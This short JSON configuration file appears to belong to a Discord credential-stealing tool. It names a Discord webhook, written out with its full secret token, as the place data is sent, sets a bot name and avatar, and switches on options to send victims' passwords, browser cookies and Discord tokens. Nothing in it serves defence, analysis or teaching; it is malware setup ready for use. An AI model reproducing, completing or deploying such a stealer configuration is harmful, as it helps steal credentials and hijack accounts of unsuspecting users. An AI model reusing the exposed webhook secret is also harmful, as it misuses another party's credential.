{
    "Title_Configs":[
        {

           "name": "SIUMENBAA",
           "servername": "SIUMENBAA",
           "program": "https://discord.com/api/webhooks/1076221904412753951/ivW675-RN0ZqbETXmYcVnuV2X8wdu_8gviE_VVAk-BAX8Jg0yQDyO5bgFjCLOzN-YjiU"

        }
    ],

    "Webhook_config":[
        {

          "Bot_Name": "zion",
          "Bot_Avatar": "https://media.discordapp.net/attachments/818904459681071126/1008774401648505013/goat6.jpg"
  
        }
    ],

    "Other_Configs":[
        {
          "SendPasswords": true,
          "SendCookie": true,
          "SendToken": true
        }
    ]


}
